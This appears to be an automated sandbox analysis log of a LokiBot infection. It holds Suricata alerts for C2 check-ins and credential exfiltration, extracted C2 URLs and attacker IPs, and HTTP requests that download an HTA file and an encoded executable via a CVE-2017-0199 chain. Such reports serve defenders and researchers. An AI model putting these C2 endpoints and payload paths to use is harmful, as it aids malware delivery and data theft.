                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49195
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49186
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49209 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49178
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49209 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49200
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49184
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49193
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49188
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49209
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49192
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49202
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49183
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49199
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49181
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49180
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49182
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49204
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49185
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49205
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49197
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49189
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49191
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49203
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49207
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49206
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49213
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49190
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49210
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49212
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49201
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49198
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49211
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49208
                Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.176.141:80 -> 192.168.2.22:49175
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.161:443 -> 192.168.2.22:49174
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: 94.156.177.220/simple/five/fre.php
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /41/SMPLRTT.txt HTTP/1.1Host: 192.3.176.141Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 192.3.176.141 192.3.176.141
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.176.141:80
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.176.141:80
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 192.3.176.141:80
                Source: global trafficHTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qrisni.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.176.141If-Range: "33147-625456f86fad3"
                Source: global trafficHTTP traffic detected: GET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.141Connection: Keep-Alive
